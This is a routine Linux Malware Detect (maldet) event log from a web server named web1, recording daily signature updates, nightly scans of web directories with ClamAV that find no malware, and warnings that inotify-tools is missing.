Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 25 2026 04:11:27 web1 maldet(131274): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 25 2026 04:11:27 web1 maldet(131274): {sigup} verified md5sum of maldet-clean.tgz
Feb 25 2026 04:11:27 web1 maldet(131274): {sigup} unpacked and installed maldet-clean.tgz
Feb 25 2026 04:11:27 web1 maldet(131274): {sigup} signature set update completed
Feb 25 2026 04:11:27 web1 maldet(131274): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 25 2026 04:11:27 web1 maldet(131476): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 25 2026 04:11:28 web1 maldet(131476): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 25 2026 04:11:28 web1 maldet(131476): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 25 2026 04:11:28 web1 maldet(131476): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 25 2026 04:11:28 web1 maldet(131476): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 25 2026 04:12:26 web1 maldet(131476): {scan} file list completed in 58s, found 29057 files...
Feb 25 2026 04:12:26 web1 maldet(131476): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 25 2026 04:12:26 web1 maldet(131476): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (29057 files) in progress...
Feb 25 2026 04:15:00 web1 maldet(131476): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 29057, malware hits 0, cleaned hits 0, time 213s
Feb 25 2026 04:15:00 web1 maldet(131476): {scan} scan report saved, to view run: maldet --report 260225-0411.131476
Feb 26 2026 03:56:31 web1 maldet(525718): {update} checking for available updates...
Feb 26 2026 03:56:31 web1 maldet(525718): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 26 2026 03:56:31 web1 maldet(525718): {update} hashing install files and checking against server...
Feb 26 2026 03:56:32 web1 maldet(525718): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 26 2026 03:56:32 web1 maldet(525718): {update} latest version already installed.
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} performing signature update check...
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} local signature set is version 202602253750710
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} new signature set 202602251468141 available
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 26 2026 03:56:32 web1 maldet(525827): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} verified md5sum of maldet-clean.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} unpacked and installed maldet-clean.tgz
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} signature set update completed
Feb 26 2026 03:56:33 web1 maldet(525827): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 26 2026 03:56:33 web1 maldet(526029): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 26 2026 03:56:33 web1 maldet(526029): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 26 2026 03:56:33 web1 maldet(526029): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 26 2026 03:56:33 web1 maldet(526029): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 26 2026 03:56:34 web1 maldet(526029): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 26 2026 03:57:16 web1 maldet(526029): {scan} file list completed in 43s, found 6982 files...
Feb 26 2026 03:57:16 web1 maldet(526029): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 26 2026 03:57:16 web1 maldet(526029): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6982 files) in progress...
Feb 26 2026 03:58:44 web1 maldet(526029): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6982, malware hits 0, cleaned hits 0, time 131s
Feb 26 2026 03:58:44 web1 maldet(526029): {scan} scan report saved, to view run: maldet --report 260226-0356.526029
Feb 27 2026 03:56:55 web1 maldet(962334): {update} checking for available updates...
Feb 27 2026 03:56:56 web1 maldet(962334): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 27 2026 03:56:56 web1 maldet(962334): {update} hashing install files and checking against server...
Feb 27 2026 03:56:56 web1 maldet(962334): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 27 2026 03:56:56 web1 maldet(962334): {update} latest version already installed.
Feb 27 2026 03:56:56 web1 maldet(962449): {sigup} performing signature update check...
Feb 27 2026 03:56:56 web1 maldet(962449): {sigup} local signature set is version 202602251468141
Feb 27 2026 03:56:56 web1 maldet(962449): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 27 2026 03:56:56 web1 maldet(962449): {sigup} latest signature set already installed
Feb 27 2026 03:56:56 web1 maldet(962537): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 27 2026 03:56:56 web1 maldet(962537): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 27 2026 03:56:56 web1 maldet(962537): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 27 2026 03:56:56 web1 maldet(962537): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 27 2026 03:56:56 web1 maldet(962537): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 27 2026 03:57:34 web1 maldet(962537): {scan} file list completed in 38s, found 9710 files...
Feb 27 2026 03:57:34 web1 maldet(962537): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 27 2026 03:57:34 web1 maldet(962537): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (9710 files) in progress...
Feb 27 2026 03:59:50 web1 maldet(962537): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 9710, malware hits 0, cleaned hits 0, time 174s
Feb 27 2026 03:59:50 web1 maldet(962537): {scan} scan report saved, to view run: maldet --report 260227-0356.962537
Feb 28 2026 03:49:01 web1 maldet(1408801): {update} checking for available updates...
Feb 28 2026 03:49:01 web1 maldet(1408801): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 28 2026 03:49:01 web1 maldet(1408801): {update} hashing install files and checking against server...
Feb 28 2026 03:49:01 web1 maldet(1408801): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 28 2026 03:49:01 web1 maldet(1408801): {update} latest version already installed.
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} performing signature update check...
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} local signature set is version 202602251468141
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} new signature set 202602283144378 available
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 28 2026 03:49:01 web1 maldet(1408931): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} verified md5sum of maldet-clean.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} unpacked and installed maldet-clean.tgz
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} signature set update completed
Feb 28 2026 03:49:02 web1 maldet(1408931): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 28 2026 03:49:02 web1 maldet(1409152): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 28 2026 03:49:03 web1 maldet(1409152): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 28 2026 03:49:03 web1 maldet(1409152): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 28 2026 03:49:03 web1 maldet(1409152): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 28 2026 03:49:03 web1 maldet(1409152): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 28 2026 03:49:47 web1 maldet(1409152): {scan} file list completed in 44s, found 2645 files...
Feb 28 2026 03:49:47 web1 maldet(1409152): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 28 2026 03:49:47 web1 maldet(1409152): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (2645 files) in progress...
Feb 28 2026 03:50:32 web1 maldet(1409152): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 2645, malware hits 0, cleaned hits 0, time 90s
Feb 28 2026 03:50:32 web1 maldet(1409152): {scan} scan report saved, to view run: maldet --report 260228-0349.1409152
Feb 28 2026 17:30:13 web1 maldet(1136): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 01 2026 04:13:28 web1 maldet(198475): {update} checking for available updates...
Mar 01 2026 04:13:28 web1 maldet(198475): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 01 2026 04:13:28 web1 maldet(198475): {update} hashing install files and checking against server...
Mar 01 2026 04:13:28 web1 maldet(198475): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 01 2026 04:13:28 web1 maldet(198475): {update} latest version already installed.
Mar 01 2026 04:13:28 web1 maldet(198586): {sigup} performing signature update check...
Mar 01 2026 04:13:28 web1 maldet(198586): {sigup} local signature set is version 202602283144378
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} new signature set 202603013092728 available
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} verified md5sum of maldet-clean.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} unpacked and installed maldet-clean.tgz
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} signature set update completed
Mar 01 2026 04:13:29 web1 maldet(198586): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 01 2026 04:13:30 web1 maldet(198797): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 01 2026 04:13:30 web1 maldet(198797): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 01 2026 04:13:30 web1 maldet(198797): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 01 2026 04:13:30 web1 maldet(198797): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 01 2026 04:13:30 web1 maldet(198797): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 01 2026 04:14:28 web1 maldet(198797): {scan} file list completed in 58s, found 4110 files...
Mar 01 2026 04:14:28 web1 maldet(198797): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 01 2026 04:14:28 web1 maldet(198797): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (4110 files) in progress...
Mar 01 2026 04:15:35 web1 maldet(198797): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 4110, malware hits 0, cleaned hits 0, time 125s
Mar 01 2026 04:15:35 web1 maldet(198797): {scan} scan report saved, to view run: maldet --report 260301-0413.198797
Mar 02 2026 03:30:13 web1 maldet(648238): {update} checking for available updates...
Mar 02 2026 03:30:13 web1 maldet(648238): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 02 2026 03:30:13 web1 maldet(648238): {update} hashing install files and checking against server...
Mar 02 2026 03:30:14 web1 maldet(648238): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 02 2026 03:30:14 web1 maldet(648238): {update} latest version already installed.
Mar 02 2026 03:30:14 web1 maldet(648347): {sigup} performing signature update check...
Mar 02 2026 03:30:14 web1 maldet(648347): {sigup} local signature set is version 202603013092728
Mar 02 2026 03:30:14 web1 maldet(648347): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 02 2026 03:30:14 web1 maldet(648347): {sigup} latest signature set already installed
Mar 02 2026 03:30:14 web1 maldet(648436): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 02 2026 03:30:14 web1 maldet(648436): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 02 2026 03:30:14 web1 maldet(648436): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 02 2026 03:30:14 web1 maldet(648436): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 02 2026 03:30:14 web1 maldet(648436): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 02 2026 03:30:51 web1 maldet(648436): {scan} file list completed in 37s, found 6364 files...
Mar 02 2026 03:30:51 web1 maldet(648436): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 02 2026 03:30:51 web1 maldet(648436): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6364 files) in progress...
Mar 02 2026 03:31:33 web1 maldet(648436): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6364, malware hits 0, cleaned hits 0, time 79s
Mar 02 2026 03:31:33 web1 maldet(648436): {scan} scan report saved, to view run: maldet --report 260302-0330.648436
Mar 02 2026 16:59:56 web1 maldet(1141): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 03 2026 03:31:10 web1 maldet(213448): {update} checking for available updates...
Mar 03 2026 03:31:10 web1 maldet(213448): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 03 2026 03:31:10 web1 maldet(213448): {update} hashing install files and checking against server...
Mar 03 2026 03:31:10 web1 maldet(213448): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 03 2026 03:31:10 web1 maldet(213448): {update} latest version already installed.
Mar 03 2026 03:31:10 web1 maldet(213561): {sigup} performing signature update check...
Mar 03 2026 03:31:10 web1 maldet(213561): {sigup} local signature set is version 202603013092728
Mar 03 2026 03:31:10 web1 maldet(213561): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 03 2026 03:31:10 web1 maldet(213561): {sigup} latest signature set already installed
Mar 03 2026 03:31:11 web1 maldet(213651): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 03 2026 03:31:11 web1 maldet(213651): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 03 2026 03:31:11 web1 maldet(213651): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 03 2026 03:31:11 web1 maldet(213651): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 03 2026 03:31:11 web1 maldet(213651): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 03 2026 03:32:11 web1 maldet(213651): {scan} file list completed in 60s, found 7655 files...
Mar 03 2026 03:32:11 web1 maldet(213651): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 03 2026 03:32:11 web1 maldet(213651): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (7655 files) in progress...
Mar 03 2026 03:33:49 web1 maldet(213651): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 7655, malware hits 0, cleaned hits 0, time 158s
Mar 03 2026 03:33:49 web1 maldet(213651): {scan} scan report saved, to view run: maldet --report 260303-0331.213651
Mar 04 2026 04:06:48 web1 maldet(736412): {update} checking for available updates...
Mar 04 2026 04:06:48 web1 maldet(736412): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 04 2026 04:06:48 web1 maldet(736412): {update} hashing install files and checking against server...
Mar 04 2026 04:06:48 web1 maldet(736412): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 04 2026 04:06:48 web1 maldet(736412): {update} latest version already installed.
Mar 04 2026 04:06:48 web1 maldet(736521): {sigup} performing signature update check...
Mar 04 2026 04:06:48 web1 maldet(736521): {sigup} local signature set is version 202603013092728
Mar 04 2026 04:06:48 web1 maldet(736521): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 04 2026 04:06:48 web1 maldet(736521): {sigup} new signature set 202603041988132 available
Mar 04 2026 04:06:48 web1 maldet(736521): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} verified md5sum of maldet-clean.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} unpacked and installed maldet-clean.tgz
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} signature set update completed
Mar 04 2026 04:06:49 web1 maldet(736521): {sigup} 17660 signatures (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 04 2026 04:06:50 web1 maldet(736730): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 04 2026 04:06:50 web1 maldet(736730): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 04 2026 04:06:50 web1 maldet(736730): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 04 2026 04:06:50 web1 maldet(736730): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 04 2026 04:06:50 web1 maldet(736730): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 04 2026 04:07:43 web1 maldet(736730): {scan} file list completed in 53s, found 41022 files...
Mar 04 2026 04:07:43 web1 maldet(736730): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 04 2026 04:07:43 web1 maldet(736730): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (41022 files) in progress...
Mar 04 2026 04:12:31 web1 maldet(736730): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 41022, malware hits 0, cleaned hits 0, time 341s
Mar 04 2026 04:12:31 web1 maldet(736730): {scan} scan report saved, to view run: maldet --report 260304-0406.736730
Mar 04 2026 10:28:16 web1 maldet(1152): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 05 2026 03:56:52 web1 maldet(283440): {update} checking for available updates...
Mar 05 2026 03:56:52 web1 maldet(283440): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 05 2026 03:56:52 web1 maldet(283440): {update} hashing install files and checking against server...
Mar 05 2026 03:56:52 web1 maldet(283440): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 05 2026 03:56:52 web1 maldet(283440): {update} latest version already installed.
Mar 05 2026 03:56:52 web1 maldet(283549): {sigup} performing signature update check...
Mar 05 2026 03:56:52 web1 maldet(283549): {sigup} local signature set is version 202603041988132
Mar 05 2026 03:56:52 web1 maldet(283549): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 05 2026 03:56:52 web1 maldet(283549): {sigup} latest signature set already installed
Mar 05 2026 03:56:53 web1 maldet(283637): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 05 2026 03:56:53 web1 maldet(283637): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 05 2026 03:56:53 web1 maldet(283637): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 05 2026 03:56:53 web1 maldet(283637): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 05 2026 03:56:53 web1 maldet(283637): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 05 2026 03:57:32 web1 maldet(283637): {scan} file list completed in 39s, found 42337 files...
Mar 05 2026 03:57:32 web1 maldet(283637): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 05 2026 03:57:32 web1 maldet(283637): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (42337 files) in progress...
Mar 05 2026 04:01:05 web1 maldet(283637): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 42337, malware hits 0, cleaned hits 0, time 252s
Mar 05 2026 04:01:05 web1 maldet(283637): {scan} scan report saved, to view run: maldet --report 260305-0356.283637
Mar 05 2026 13:46:15 web1 maldet(1146): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 06 2026 04:34:27 web1 maldet(260375): {update} checking for available updates...
Mar 06 2026 04:34:27 web1 maldet(260375): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
